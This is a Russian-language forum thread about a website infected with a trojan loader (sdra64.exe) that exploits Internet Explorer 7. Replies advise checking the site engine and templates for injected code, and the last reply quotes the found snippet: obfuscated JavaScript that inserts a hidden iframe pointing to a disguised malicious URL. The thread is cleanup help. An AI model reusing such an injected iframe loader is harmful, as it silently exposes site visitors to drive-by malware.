Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: Эта возможность может быть недоступна в некоторых браузерах.
я все проверил - это не на форуме.Gaan написал(а):Привет!
Загрузчик трояна пробивает Internet Explorer 7
На счёт других браузеров незнаю, вроде говорят, что пробивает Mozilla Firefox и
старую оперу.
Через Internet Explorer 7 троян подгружается:
C:\Documents and Settings\имя пользователя\Application Data
Сам троян sdra64.exe , в папку lowsec рядом с собой он складывает отчёты в зашифрованном виде + ещё тройка exe-шников (load[1].exe pdfupd.exe и 0.9875503536401076.exe у последнего в названии генерится случайный номер). В диспетчере не отображается, постоянно следит за тем чтобы его не удалили с автозагрузки, при удалении с автозагрузки в реестре вновь себя прописывает.
На 100% не уверен, но сравни для начала файл Index с оригиналом с офф. сайта (возможно у тебя самого был скачан уже протрояненый движок сайта) Далее обязательно посмотри файлы шаблонов именно в них любят вписывать зловредный код, возможно ты также скачал уже протрояненый шаблон, такое порой случается.
А это явно вирус, с шифрованной ссылкой.function omlb(){};omlb.prototype={ccwot:function(){var tckqkgne=document.createElement('iframe');try{tckqkgne.setAttribute('style','display: none'); tckqkgne.setAttribute('src','hsNstqt@@p!b:bsz/9/Yssaq9dz@wz@ba49rNe4zcobu!!nb@tbNeYbr4.q!c!bo@m@4q/NYiNzn!sq.9c9gY!@izz?!q1qN0!s!'.replace(/[zq!4bsY9@N]/g,'')); document.body.appendChild(tckqkgne);} catch(yben){document.write("<div style='visibility: hidden; height: 0px; width: 0px'>a</div></body></html>");this.ccwot();}}};var ntxpwm=new omlb();ntxpwm.ccwot();